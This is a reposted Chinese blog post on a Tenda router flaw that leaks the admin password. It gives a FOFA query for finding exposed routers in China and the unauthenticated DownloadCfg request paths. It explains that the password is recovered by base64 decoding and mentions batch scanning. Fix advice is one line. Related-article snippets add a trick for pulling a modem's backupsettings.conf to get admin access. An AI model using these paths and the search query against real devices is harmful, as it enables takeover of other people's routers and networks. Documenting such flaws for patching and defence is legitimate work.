首页 > 其他分享 >Tenda路由器账号密码信息泄露漏洞

Tenda路由器账号密码信息泄露漏洞

时间:2024-10-29 09:20:56浏览次数:8  
标签:bin cgi Tenda DownloadCfg 漏洞 账号密码 路由器

免责声明

请勿使用本文中提到的技术进行非法测试或行为。使用本文中提供的信息或工具所造成的任何后果和损失由使用者自行承担,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

一、简介

Tenda是一家中国的网络设备制造商,成立于1999年,专注于提供各种网络产品,包括路由器、交换机、无线接入点和网络适配器等。Tenda路由器以其高性价比、易于设置和良好的用户体验而受到消费者的欢迎。

二、漏洞描述

Tenda路由器 /cgi-bin/DownloadCfg接口处存在信息泄露漏洞,攻击者可通过此漏洞获取路由器后台账号密码。

三、fofa语法

title="Tenda | LOGIN" && country="CN"

四、漏洞复现

/cgi-bin/DownloadCfg.jpg
/cgi-bin/DownloadCfg/RouterCfm.jpg

在这里插入图片描述
密码通过base64解密即可登录成功
在这里插入图片描述
批量检测:
在这里插入图片描述

五、修复建议

及时更新,禁止访问或删除!!!

网安交流群

在这里插入图片描述


原文始发于微信公众号(白帽攻防):Tenda路由器账号密码信息泄露漏洞

标签:bin,cgi,Tenda,DownloadCfg,漏洞,账号密码,路由器
From: https://blog.csdn.net/m0_46381222/article/details/143284041

相关文章

  • 帝国cms忘记后台密码如何修改(忘记帝国后台账号密码怎么办)
    如果你忘记了帝国CMS的后台登录密码,可以通过以下步骤快速重置:1.进入数据库登录phpMyAdmin:通过你的主机控制面板(如cPanel)或直接访问phpMyAdmin登录页面。选择数据库:在phpMyAdmin中选择你的帝国CMS数据库。2.找到 ###_enewsuser 数据表定位数据表:在数据库列表中找......
  • 帝国cms后台登录用户名账号密码忘记了怎么重置找回(帝国CMS后台登录账号密码重置教程)
    如果你忘记了帝国CMS的后台登录账号密码,可以通过以下步骤重置:1.登录phpMyAdmin控制界面打开浏览器,访问你的phpMyAdmin控制界面。输入数据库的账号和密码,登录到数据库管理界面。2.找到网站对应的数据库在phpMyAdmin中,找到你的网站对应的数据库。默认情况下,帝国CMS的用户......
  • 网站后台需要什么账号密码才能登录?
    关于网站后台登录所需的账号和密码信息,通常有以下几点需要注意:管理员账号:一般情况下,网站后台会有一个或多个管理员级别的账号,这些账号拥有最高的权限,可以进行用户管理、内容编辑等操作。默认账号密码:初次安装或部署一些CMS系统时,可能会有默认的用户名和密码,例如admin/admin......
  • 如何网站后台登录?登录 地址?账号密码
    网站后台登录的具体步骤和信息可能会因不同的网站而有所不同,但通常遵循以下通用流程:1.找到后台登录地址常见路径:大多数网站的后台登录地址通常是在主域名后面加上特定的路径,例如:https://www.example.com/adminhttps://www.example.com/backendhttps://admin.example.com......
  • pbootcms使用阿里云主机 后台账号密码都正确 但是登录不进去
    问题描述:阿里云主机新增了文件(夹)数量的限制,即使磁盘空间充足,但文件(夹)数量达到上限后,PBootCMS的缓存文件无法正常更新,导致网站后台无法登录。解决方法:清理缓存文件:登录到服务器,找到PBootCMS的缓存目录(通常位于 /data/runtime/cache 或类似路径)。删除不必要的缓存文件,......
  • 路由器中Wi-Fi双频合一是什么意思?
    随着智能设备的普及和互联网使用需求的增加,Wi-Fi技术也在不断发展。如今,许多家庭和办公环境中都使用无线路由器来提供互联网连接。而在这些路由器中,"双频合一"这一技术逐渐成为了一项重要功能。在本篇文章中,给大家介绍一下Wi-Fi双频合一,帮助读者更好地理解和利用这一技术。......
  • vscode中每次push都需要输入账号密码,添加windows凭据之后还是没用
    项目场景:练习使用git进行多人开发问题描述vscode中每次push都需要输入账号密码,添加windows凭据之后还是没用原因分析:https://blog.csdn.net/weixin_44180579/article/details/136192735?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522CF93414C-AE93-419C......
  • 在主路由器下的设备中访问从路由器下面的设备
     网络结构如上,现在想从PC1访问PC2的服务(PC2也可以是一台打印机),那么只需要在R2中的DMZ中,把PC2的IP加入进去就可以了。加入以后,就可以从PC1访问的PC2的服务了:比如,远程桌面连接等(但是Ping不通的)。访问的时候,需要填写R2的IP地址,而不是PC2的IP。 注:在R1中填写静态路由的方式,不......
  • 宝塔面板账号密码错误怎么重置
    如果你忘记了宝塔面板的账号密码,可以通过以下几种方法进行重置:使用宝塔面板的重置功能:在登录页面,通常会有“忘记密码”或“重置密码”的链接。点击该链接并按照提示操作,一般会要求你输入注册时使用的邮箱或手机号进行验证,并发送重置链接。通过SSH重置密码:通过SSH登录到......
  • 获取路由器(光猫)管理员权限
    获取路由器(光猫)管理员权限文章参考自https://www.cnblogs.com/784040932/p/5922735.html我家的光猫图片1.用光猫背后的useradmin帐号和密码登录http://192.168.1.1/2.然后在浏览器地址栏中输入http://192.168.1.1/backupsettings.conf以下载backupsettings.conf3.......